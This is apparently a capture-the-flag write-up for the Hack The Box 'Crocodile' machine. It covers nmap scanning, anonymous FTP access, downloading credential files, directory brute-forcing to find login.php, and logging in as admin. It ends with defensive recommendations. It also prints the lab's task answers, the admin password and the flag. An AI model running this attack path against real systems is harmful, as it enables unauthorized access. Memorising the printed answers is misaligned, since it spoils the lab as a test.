End-to-end engagement showing service behavior, attack-path logic, and containment strategy. Reflects practical penetration testing methodology.
# Penetration Test Report: HTB Crocodile
## 1. Objective
The purpose of this engagement was to assess the security posture of the HTB Crocodile machine by identifying exposed services, enumerating available access points, and validating authentication weaknesses. This report outlines the reconnaissance process, discovered vulnerabilities, exploitation steps, and the final capture of the root flag.
---
## 2. Target Information
**Target Host:** Crocodile
**IP Address:** 10.129.184.140
**Operating System:** Ubuntu (Apache 2.4.41 detected)
**Services:** FTP, HTTP, DNS (filtered)
---
## 3. Methodology
This assessment followed a straightforward workflow:
1. Recon
2. Enumeration
3. Credential Discovery
4. Web Authentication Bypass
5. Post-Authentication Validation
All testing was performed inside the authorized HTB environment.
---
## 4. Recon and Enumeration
### 4.1 Nmap Scan
**Command:**
```bash
sudo nmap -sV -O 10.129.184.140
````
### Scan Summary
Nmap revealed an open FTP server with anonymous login enabled and an Apache web server hosting the application.
| Port | State | Service | Version |
| ------ | -------- | ------- | ---------------------------- |
| 21/tcp | open | ftp | vsftpd 3.0.3 |
| 53/tcp | filtered | domain | unknown |
| 80/tcp | open | http | Apache httpd 2.4.41 (Ubuntu) |
The presence of anonymous FTP access is a critical finding.
---
## 5. FTP Enumeration
### Task 1
**Nmap switch that uses default scripts:**
```
-sC
```
### Task 2
**Service on port 21:**
```
vsftpd 3.0.3
```
Connect to FTP:
```bash
ftp 10.129.184.140
```
Login credentials:
```
Username: anonymous
```
### Task 3
**FTP code for successful anonymous login:**
```
230
```
### Task 4
**Anonymous login username:**
```
anonymous
```
### Task 5
**Command to download files from FTP:**
```
get
```
After logging in:
```bash
ls
```
You will find:
```
allowed.userlist
allowed.userlist.passwd
```
Download both:
```bash
get allowed.userlist
get allowed.userlist.passwd
```
### Task 6
**High privilege sounding username found:**
```
admin
```
These files provide usernames and passwords for later web authentication.
---
## 6. Web Enumeration
### Task 7
**Apache version running on the host:**
```
Apache httpd 2.4.41
```
### Task 8
**Gobuster switch for filetype extension searches:**
```
-x
```
### Task 9
**PHP file discovered via directory brute force that enables login:**
Use Feroxbuster or Gobuster. Example:
```bash
feroxbuster -u http://10.129.184.140 --extensions "php,txt"
```
Important directory discovered:
```
/dashboard/
```
This redirects to:
```
login.php
```
**Answer:**
```
login.php
```
---
## 7. Exploitation
Using the credentials obtained from the FTP files:
```
username: admin
password: rKXM59ESxesUFHAd
```
Log in at:
```
http://10.129.184.140/dashboard/login.php
```
After successful authentication, the application displays the root flag.
---
## 8. Proof of Compromise
**Root Flag:**
```
c7110277ac44d78b6a9fff2232434d16
```
This confirms full access to the internal dashboard and successful compromise of the machine.
---
## 9. Recommendations
1. Disable anonymous FTP access.
2. Enforce strong authentication for file storage areas.
3. Restrict FTP exposure to trusted networks.
4. Implement directory traversal protection and enumeration rate limiting.
5. Avoid storing plaintext credentials in public directories.
6. Monitor access logs for unusual brute force attempts.
---
## 10. Conclusion
The Crocodile machine was compromised through a combination of anonymous FTP access and exposed credential files. These credentials allowed direct authentication into the dashboard application, leading to retrieval of the root flag. Proper access control and secure credential handling would prevent this attack path.
---